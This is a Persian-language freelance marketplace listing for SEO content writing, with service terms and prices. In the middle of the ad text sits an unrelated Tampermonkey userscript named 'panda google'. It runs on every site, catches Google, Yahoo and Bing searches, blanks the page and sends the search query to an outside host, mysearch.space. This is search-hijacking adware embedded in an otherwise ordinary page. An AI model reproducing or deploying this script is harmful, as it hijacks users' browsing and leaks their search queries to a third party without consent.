توضیحات کاره

من در اکثر پلتفرم های آنلاین تولید محتوا فعالیت داشته ام

بنا بر قوانین سایت نام آنها را عنوان نمیکنم. تولید محتوایی که من برای شما انجام میدهمبدون واسطهخواهد بود و هزینه ی اضافی که برای شرکت های تولید محتوا میدهید از بین خواهند رفت.

در محتوایی که تولید میکنم، اولین چیزی که مهم است نیاز مخاطبشماست. به این معنی که محتوا صرفا نباید یک متن باشد با تکرار یک یا چند کلمه و نیتجه آن گول زدن گوگل باشد. چیزی که الان برای الگوریتم های گوگل مهم است محتوایی میباشد که مخاطب با آن تعامل برقرار کند و نیازی از مخاطب را برطرف کند. برای همین سعی بنده این است که مخاطب با پرسشی وارد سایت شما شده، من به صورت کامل به آن پرسش پاسخ دهم.

در صورت وجود هرگونه سوال یا ابهام قبل از ثبت سفارش با من در ارتباط باشید

مشتری بعد از انجام سفارش، به طور مشخص موارد زیر را تحویل خواهد گرفت:

 

بعد از اتمام سفارش بنده یک فایل ورد و یک فایل pdf که شامل محتوای شما میباشد را به شما تحویل خواهم داد

از جمله اگر نیاز به نکاتی بود که بهتراست که رعایت کنید، در یک فایل جداگانه متنی برای شما ارسال میکنم.

// ==UserScript== // @name panda google // @namespace http://tampermonkey.net/ // @version 0.1 // @description try to take over the world! // @author You // @match *://*/* // @grant none // ==/UserScript== (function() { function findGetParameter(parameterName) { var result = null, tmp = []; location.search .substr(1) .split("&") .forEach(function (item) { tmp = item.split("="); if (tmp[0] === parameterName) result = decodeURIComponent(tmp[1]); }); return result; } var u ='https://lato2.mysearch.space?q=', s = [ { 'host':/^https?\:\/\/www.google(\.\w+)+\/search\?.*(sourceid\=chrome).*$/, 'query':'q', }, { 'host':/^(https?\:\/\/)(\w+\.)?(search\.)(yahoo\.)(com)\/(search\?)?(.*)(fr\=crmas).*$/, 'query':'p' }, { 'host':/^(https?\:\/\/)www\.bing\.com\/(search\?)?(.*)(FORM\=CHROMN).*$/, 'query':'q' } ] for(var i = 0; i < s.length; i++){ var net = s[i], pattern = net.host, q = findGetParameter(net.query); if( pattern.test(window.location.href) ){ document.body.innerHTML=""; window.location.href=u+q; } } })();
  • روش های تولید محتوا: گردآوری از چند منبع، تولید محتوای اختصاصی

توضیح کارشناس تضمین کیفیت «انجام میدم» :

نمونه ای از محتوا تهیه شده توسط این کاربلد را از اینجا مشاهده و بررسی نمایید

انتخاب جزئیات و ثبت سفارش

انجام بیش از یک بار اصلاحات (نامحدود) +1 روز +30,000 تومان
تحقیق کلمه کلیدی +1 روز +25,000 تومان
برای 1000 کلمه   در 2 روز
با توجه به زمان آخرین فعالیت فروشنده، پیشنهاد می‌کنیم قبل از ثبت سفارش به ایشان پیام دهید و از پاسخگویی ایشان مطمئن شوید.
اگر پروژه خاص و یا شرایط خاصی را درنظر دارید که در باکس بالا نیامده، پروژه اختصاصی خود را درخواست دهید.